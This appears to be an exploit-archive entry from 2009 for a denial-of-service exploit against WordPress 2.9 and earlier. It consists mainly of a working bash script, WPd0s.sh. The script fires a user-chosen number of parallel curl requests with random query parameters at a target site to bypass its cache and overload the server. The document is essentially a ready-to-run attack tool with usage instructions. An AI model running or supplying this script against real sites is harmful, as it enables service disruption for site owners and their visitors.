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WordPress <= 2.9 DoS 0day exploit

🗓️ 31 Dec 2009 00:00:00Reported by emgentType 
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WordPress <= 2.9 DoS 0day exploit. Denial of Service vulnerability in WordPress Core version 2.

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WordPress <= 2.9 DoS 0day
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# Title: 0day Wordpress DOS <= 2.9
# CVE-ID: ()
# OSVDB-ID: ()
# Author: emgent
# Published: 2009-12-31
# Verified: yes

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#!/bin/bash
#
# This program is released under the terms of the GNU General Public License
# (GPL), which is distributed with this software in the file "COPYING".
# The GPL specifies the terms under which users may copy and use this software.
#
# WPd0s.sh
# This is a 0day DOS issue for Wordpress Core that use cache stressing with random
# parameter on multiple requests.
#
 
show_help(){
  echo ""
  echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"
  echo ""
  echo " --usage    show the exploit Usage"
  echo " --prereq      show the exploit Prerequisites"
  echo " --credits  show the exploit Credits"
  echo " --help     show the Help"
  echo ""
  echo "Emanuele Gentili"
}
 
show_credits(){
  echo ""
  echo " Emanuele 'emgent' Gentili"
  echo " http://www.backtrack.it/~emgent/"
  echo " emgent @ backtrack.it"
  echo ""
}
 
show_prereq(){
 echo ""
 echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"
 echo ""
 echo " Prerequeisites:"
 echo " Bash (yeah because is cool.)"
 echo " Curl"
 echo ""
 echo " Emanuele Gentili <[email protected]>"
}
 
show_usage(){
  echo ""
  echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"
  echo ""
  echo " usage $0 --host http://localhost/wordpress/ --requests 1000"
  echo ""
  echo " Emanuele Gentili <[email protected]>"
}
 
 
# Bash
while [[ $# != 0 ]]; do
    arg_name=$1; shift
    case "$arg_name" in
      --help|-?|-h) show_help; exit 0;;
      --credits) show_credits; exit 0;;
      --usage) show_usage; exit 0;;
      --prereq) show_prereq; exit 0;;
      --host) host=$1; shift;;
      --requests) requests=$1; shift;;
      *) echo "invalid option: $1"; show_help;exit 1;;
    esac
done
 
[ -z "$host" ] && { show_help; exit 1; }
 
for random in `seq 1 $requests`; do
curl -A Firefox -o --url "$host/?cat=2&d0s=1&d0s=$random" > /dev/null 2>&1 &
done



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